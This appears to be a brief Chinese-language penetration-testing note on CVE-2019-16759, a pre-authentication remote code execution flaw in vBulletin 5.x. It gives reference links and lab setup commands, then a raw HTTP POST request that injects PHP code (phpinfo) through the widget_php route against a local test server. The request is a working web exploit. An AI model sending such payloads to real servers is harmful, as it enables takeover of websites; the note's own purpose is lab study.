CVE-2019-16759 vBulletin 5.x pre-auth RCE exploit

<!–more–>

参考资料

vBulletin 5.x 0day pre-auth RCE exploit
https://seclists.org/fulldisclosure/2019/Sep/31

vBulletin 5.x 前台代码执行漏洞分析 -【CVE-2019-16759】
https://xz.aliyun.com/t/6419

vBulletin zero-day exploited in the wild in wake of exploit release
https://www.helpnetsecurity.com/2019/09/25/cve-2019-16759/

环境搭建 （复杂）

https://github.com/asosso/docker-vbulletin

# 先确认编译工具链足够齐全
yum -y install gcc install autoconf automake libtool

# 之后安装 php 扩展依赖
yum install -y php php-mysql php-curl php-openssl php-iconv php-mbstring php-json php-xml php-pear php-devel

How to Install vBulletin 5 Connect
https://www.youtube.com/watch?v=_tmCHZvm8j4

环境搭建 (简单)

$ docker run -ti -P --name vbulletin p8361/vbulletin-cve-2015-7808 /bin/bash
# /run.sh
vBulletin 5.1.5

请求响应

POST / HTTP/1.1
Host: 127.0.0.1
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.21.0
Content-Length: 73
Content-Type: application/x-www-form-urlencoded

routestring=ajax%2Frender%2Fwidget_php&widgetConfig[code]=phpinfo();exit;

• #CloudScanner
• #Penetration Testing